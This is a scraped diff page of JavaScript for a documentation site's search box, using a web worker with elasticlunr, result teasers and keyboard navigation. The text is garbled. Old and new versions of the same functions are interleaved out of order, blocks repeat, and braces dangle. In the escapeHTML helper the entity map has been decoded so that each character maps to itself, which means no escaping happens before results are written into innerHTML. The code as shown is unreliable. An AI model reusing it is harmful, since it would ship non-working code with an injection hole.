|                 body : doc.body, | ||||
|                 breadcrumbs: doc.breadcrumbs, | ||||
|                 url  : s.base + s.urls[r.ref], | ||||
|                 cloud: s.cloud | ||||
|               }); | ||||
|             }); | ||||
|           }); | ||||
|         } | ||||
|         all.sort((a,b)=>b.norm-a.norm); | ||||
|         postMessage(all.slice(0,MAX)); | ||||
|       }; | ||||
|     })(); | ||||
|   `;
 | ||||
|           } | ||||
|           all.sort((a,b)=>b.norm-a.norm); | ||||
|           postMessage(all.slice(0,MAX)); | ||||
|     }; | ||||
|     `;
 | ||||
|    | ||||
|     /* ───────────── 2. spawn worker ───────────── */ | ||||
|     const worker = new Worker(URL.createObjectURL(new Blob([workerCode],{type:'application/javascript'}))); | ||||
|      | ||||
|     /* ───────────── 2.1. initialize worker with language ───────────── */ | ||||
|     const htmlLang = (document.documentElement.lang || 'en').toLowerCase(); | ||||
|     const lang = htmlLang.split('-')[0]; | ||||
|     worker.postMessage({type: 'init', lang: lang}); | ||||
|    | ||||
|     /* ───────────── 3. DOM refs ─────────────── */ | ||||
|     const wrap    = document.getElementById('search-wrapper'); | ||||
|     const bar     = document.getElementById('searchbar'); | ||||
|     const list    = document.getElementById('searchresults'); | ||||
|     const listOut = document.getElementById('searchresults-outer'); | ||||
|     const header  = document.getElementById('searchresults-header'); | ||||
|     const icon    = document.getElementById('search-toggle'); | ||||
|    | ||||
|     const READY_ICON = icon.innerHTML; | ||||
|     icon.textContent = '⏳'; | ||||
|     icon.setAttribute('aria-label','Loading search …'); | ||||
|       icon.setAttribute('title','Search is loading, please wait...'); | ||||
| 
 | ||||
|   /* ───────────── 2. spawn worker ───────────── */ | ||||
|   const worker = new Worker(URL.createObjectURL(new Blob([workerCode],{type:'application/javascript'}))); | ||||
| 
 | ||||
|   /* ───────────── 3. DOM refs ─────────────── */ | ||||
|   const wrap    = document.getElementById('search-wrapper'); | ||||
|   const bar     = document.getElementById('searchbar'); | ||||
|   const list    = document.getElementById('searchresults'); | ||||
|   const listOut = document.getElementById('searchresults-outer'); | ||||
|   const header  = document.getElementById('searchresults-header'); | ||||
|   const icon    = document.getElementById('search-toggle'); | ||||
| 
 | ||||
|   const READY_ICON = icon.innerHTML; | ||||
|   icon.textContent = '⏳'; | ||||
|   icon.setAttribute('aria-label','Loading search …'); | ||||
|   icon.setAttribute('title','Search is loading, please wait...'); | ||||
| 
 | ||||
|   const HOT=83, ESC=27, DOWN=40, UP=38, ENTER=13; | ||||
|   let debounce, teaserCount=0; | ||||
| 
 | ||||
|   /* ───────────── helpers (teaser, metric) ───────────── */ | ||||
|   const escapeHTML = (()=>{const M={'&':'&','<':'<','>':'>','"':'"','\'':'''};return s=>s.replace(/[&<>'"]/g,c=>M[c]);})(); | ||||
|   const URL_MARK='highlight'; | ||||
|   function metric(c,t){return c?`${c} search result${c>1?'s':''} for '${t}':`:`No search results for '${t}'.`;} | ||||
| 
 | ||||
|   function makeTeaser(body,terms){ | ||||
|     const stem=w=>elasticlunr.stemmer(w.toLowerCase()); | ||||
|     const T=terms.map(stem),W_S=40,W_F=8,W_N=2,WIN=30; | ||||
|     const W=[],sents=body.toLowerCase().split('. '); | ||||
|     let i=0,v=W_F,found=false; | ||||
|     sents.forEach(s=>{v=W_F; s.split(' ').forEach(w=>{ if(w){ if(T.some(t=>stem(w).startsWith(t))){v=W_S;found=true;} W.push([w,v,i]); v=W_N;} i+=w.length+1; }); i++;}); | ||||
|     if(!W.length) return body; | ||||
|     const win=Math.min(W.length,WIN); | ||||
|     const sums=[W.slice(0,win).reduce((a,[,wt])=>a+wt,0)]; | ||||
|     for(let k=1;k<=W.length-win;k++) sums[k]=sums[k-1]-W[k-1][1]+W[k+win-1][1]; | ||||
|     const best=found?sums.lastIndexOf(Math.max(...sums)):0; | ||||
|     const out=[]; i=W[best][2]; | ||||
|     for(let k=best;k<best+win;k++){const [w,wt,pos]=W[k]; if(i<pos){out.push(body.substring(i,pos)); i=pos;} if(wt===W_S) out.push('<em>'); out.push(body.substr(pos,w.length)); if(wt===W_S) out.push('</em>'); i=pos+w.length;} | ||||
|     return out.join(''); | ||||
|   } | ||||
| 
 | ||||
|   function format(d,terms){ | ||||
|     const teaser=makeTeaser(escapeHTML(d.body),terms); | ||||
|     teaserCount++; | ||||
|     const enc=encodeURIComponent(terms.join(' ')).replace(/'/g,'%27'); | ||||
|     const parts=d.url.split('#'); if(parts.length===1) parts.push(''); | ||||
|     const abs=d.url.startsWith('http'); | ||||
|     const href=`${abs?'':path_to_root}${parts[0]}?${URL_MARK}=${enc}#${parts[1]}`; | ||||
|     const style=d.cloud?" style=\"color:#1e88e5\"":""; | ||||
|     const isCloud=d.cloud?" [Cloud]":" [Book]"; | ||||
|     return `<a href="${href}" aria-details="teaser_${teaserCount}"${style}>`+ | ||||
|            `${d.breadcrumbs}${isCloud}<span class="teaser" id="teaser_${teaserCount}" aria-label="Search Result Teaser">${teaser}</span></a>`; | ||||
|   } | ||||
| 
 | ||||
|   /* ───────────── UI control ───────────── */ | ||||
|   function showUI(s){wrap.classList.toggle('hidden',!s); icon.setAttribute('aria-expanded',s); if(s){window.scrollTo(0,0); bar.focus(); bar.select();} else {listOut.classList.add('hidden'); [...list.children].forEach(li=>li.classList.remove('focus'));}} | ||||
|   function blur(){const t=document.createElement('input'); t.style.cssText='position:absolute;opacity:0;'; icon.appendChild(t); t.focus(); t.remove();} | ||||
| 
 | ||||
|   icon.addEventListener('click',()=>showUI(wrap.classList.contains('hidden'))); | ||||
| 
 | ||||
|   document.addEventListener('keydown',e=>{ | ||||
|     if(e.altKey||e.ctrlKey||e.metaKey||e.shiftKey) return; | ||||
|     const f=/^(?:input|select|textarea)$/i.test(e.target.nodeName); | ||||
|     if(e.keyCode===HOT && !f){e.preventDefault(); showUI(true);} else if(e.keyCode===ESC){e.preventDefault(); showUI(false); blur();} | ||||
|     else if(e.keyCode===DOWN && document.activeElement===bar){e.preventDefault(); const first=list.firstElementChild; if(first){blur(); first.classList.add('focus');}} | ||||
|     else if([DOWN,UP,ENTER].includes(e.keyCode) && document.activeElement!==bar){const cur=list.querySelector('li.focus'); if(!cur) return; e.preventDefault(); if(e.keyCode===DOWN){const nxt=cur.nextElementSibling; if(nxt){cur.classList.remove('focus'); nxt.classList.add('focus');}} else if(e.keyCode===UP){const prv=cur.previousElementSibling; cur.classList.remove('focus'); if(prv){prv.classList.add('focus');} else {bar.focus();}} else {const a=cur.querySelector('a'); if(a) window.location.assign(a.href);}} | ||||
|   }); | ||||
| 
 | ||||
|   bar.addEventListener('input',e=>{ clearTimeout(debounce); debounce=setTimeout(()=>worker.postMessage(e.target.value.trim()),120); }); | ||||
| 
 | ||||
|   /* ───────────── worker messages ───────────── */ | ||||
|   worker.onmessage = ({data}) => { | ||||
|     if(data && data.ready!==undefined){ | ||||
|       if(data.ready){  | ||||
|         icon.innerHTML=READY_ICON;  | ||||
|         icon.setAttribute('aria-label','Open search (S)');  | ||||
|         icon.removeAttribute('title'); | ||||
|       } | ||||
|       else {  | ||||
|         icon.textContent='❌';  | ||||
|         icon.setAttribute('aria-label','Search unavailable');  | ||||
|         icon.setAttribute('title','Search is unavailable'); | ||||
|       } | ||||
|       return; | ||||
|    | ||||
|     const HOT=83, ESC=27, DOWN=40, UP=38, ENTER=13; | ||||
|     let debounce, teaserCount=0; | ||||
|    | ||||
|     /* ───────────── helpers (teaser, metric) ───────────── */ | ||||
|     const escapeHTML = (()=>{const M={'&':'&','<':'<','>':'>','"':'"','\'':'''};return s=>s.replace(/[&<>'"]/g,c=>M[c]);})(); | ||||
|     const URL_MARK='highlight'; | ||||
|     function metric(c,t){return c?`${c} search result${c>1?'s':''} for '${t}':`:`No search results for '${t}'.`;} | ||||
|    | ||||
|     function makeTeaser(body,terms){ | ||||
|       const stem=w=>elasticlunr.stemmer(w.toLowerCase()); | ||||
|       const T=terms.map(stem),W_S=40,W_F=8,W_N=2,WIN=30; | ||||
|       const W=[],sents=body.toLowerCase().split('. '); | ||||
|       let i=0,v=W_F,found=false; | ||||
|       sents.forEach(s=>{v=W_F; s.split(' ').forEach(w=>{ if(w){ if(T.some(t=>stem(w).startsWith(t))){v=W_S;found=true;} W.push([w,v,i]); v=W_N;} i+=w.length+1; }); i++;}); | ||||
|       if(!W.length) return body; | ||||
|       const win=Math.min(W.length,WIN); | ||||
|       const sums=[W.slice(0,win).reduce((a,[,wt])=>a+wt,0)]; | ||||
|       for(let k=1;k<=W.length-win;k++) sums[k]=sums[k-1]-W[k-1][1]+W[k+win-1][1]; | ||||
|       const best=found?sums.lastIndexOf(Math.max(...sums)):0; | ||||
|       const out=[]; i=W[best][2]; | ||||
|       for(let k=best;k<best+win;k++){const [w,wt,pos]=W[k]; if(i<pos){out.push(body.substring(i,pos)); i=pos;} if(wt===W_S) out.push('<em>'); out.push(body.substr(pos,w.length)); if(wt===W_S) out.push('</em>'); i=pos+w.length;} | ||||
|       return out.join(''); | ||||
|     } | ||||
|     const docs=data, q=bar.value.trim(), terms=q.split(/\s+/).filter(Boolean); | ||||
|     header.textContent=metric(docs.length,q); | ||||
|     clear(list); | ||||
|     docs.forEach(d=>{const li=document.createElement('li'); li.innerHTML=format(d,terms); list.appendChild(li);}); | ||||
|     listOut.classList.toggle('hidden',!docs.length); | ||||
|   }; | ||||
| })(); | ||||
| 
 | ||||
|    | ||||
|     function format(d,terms){ | ||||
|       const teaser=makeTeaser(escapeHTML(d.body),terms); | ||||
|       teaserCount++; | ||||
|       const enc=encodeURIComponent(terms.join(' ')).replace(/'/g,'%27'); | ||||
|       const parts=d.url.split('#'); if(parts.length===1) parts.push(''); | ||||
|       const abs=d.url.startsWith('http'); | ||||
|       const href=`${abs?'':path_to_root}${parts[0]}?${URL_MARK}=${enc}#${parts[1]}`; | ||||
|       const style=d.cloud?" style=\"color:#1e88e5\"":""; | ||||
|       const isCloud=d.cloud?" [Cloud]":" [Book]"; | ||||
|       return `<a href="${href}" aria-details="teaser_${teaserCount}"${style}>`+ | ||||
|              `${d.breadcrumbs}${isCloud}<span class="teaser" id="teaser_${teaserCount}" aria-label="Search Result Teaser">${teaser}</span></a>`; | ||||
|     } | ||||
|    | ||||
|     /* ───────────── UI control ───────────── */ | ||||
|     function showUI(s){wrap.classList.toggle('hidden',!s); icon.setAttribute('aria-expanded',s); if(s){window.scrollTo(0,0); bar.focus(); bar.select();} else {listOut.classList.add('hidden'); [...list.children].forEach(li=>li.classList.remove('focus'));}} | ||||
|     function blur(){const t=document.createElement('input'); t.style.cssText='position:absolute;opacity:0;'; icon.appendChild(t); t.focus(); t.remove();} | ||||
|    | ||||
|     icon.addEventListener('click',()=>showUI(wrap.classList.contains('hidden'))); | ||||
|    | ||||
|     document.addEventListener('keydown',e=>{ | ||||
|       if(e.altKey||e.ctrlKey||e.metaKey||e.shiftKey) return; | ||||
|       const f=/^(?:input|select|textarea)$/i.test(e.target.nodeName); | ||||
|       if(e.keyCode===HOT && !f){e.preventDefault(); showUI(true);} else if(e.keyCode===ESC){e.preventDefault(); showUI(false); blur();} | ||||
|       else if(e.keyCode===DOWN && document.activeElement===bar){e.preventDefault(); const first=list.firstElementChild; if(first){blur(); first.classList.add('focus');}} | ||||
|       else if([DOWN,UP,ENTER].includes(e.keyCode) && document.activeElement!==bar){const cur=list.querySelector('li.focus'); if(!cur) return; e.preventDefault(); if(e.keyCode===DOWN){const nxt=cur.nextElementSibling; if(nxt){cur.classList.remove('focus'); nxt.classList.add('focus');}} else if(e.keyCode===UP){const prv=cur.previousElementSibling; cur.classList.remove('focus'); if(prv){prv.classList.add('focus');} else {bar.focus();}} else {const a=cur.querySelector('a'); if(a) window.location.assign(a.href);}} | ||||
|     }); | ||||
|    | ||||
|     bar.addEventListener('input',e=>{ clearTimeout(debounce); debounce=setTimeout(()=>worker.postMessage({query: e.target.value.trim()}),120); }); | ||||
|    | ||||
|     /* ───────────── worker messages ───────────── */ | ||||
|     worker.onmessage = ({data}) => { | ||||
|       if(data && data.ready!==undefined){ | ||||
|         if(data.ready){  | ||||
|           icon.innerHTML=READY_ICON;  | ||||
|           icon.setAttribute('aria-label','Open search (S)');  | ||||
|           icon.removeAttribute('title'); | ||||
|         } | ||||
|         else {  | ||||
|           icon.textContent='❌';  | ||||
|           icon.setAttribute('aria-label','Search unavailable');  | ||||
|           icon.setAttribute('title','Search is unavailable'); | ||||
|         } | ||||
|         return; | ||||
|       } | ||||
|       const docs=data, q=bar.value.trim(), terms=q.split(/\s+/).filter(Boolean); | ||||
|       header.textContent=metric(docs.length,q); | ||||
|       clear(list); | ||||
|       docs.forEach(d=>{const li=document.createElement('li'); li.innerHTML=format(d,terms); list.appendChild(li);}); | ||||
|       listOut.classList.toggle('hidden',!docs.length); | ||||
|     }; | ||||
|   })(); | ||||
|    | ||||
		Loading…
	
	
			
			x
			
			
		
	
		Reference in New Issue
	
	Block a user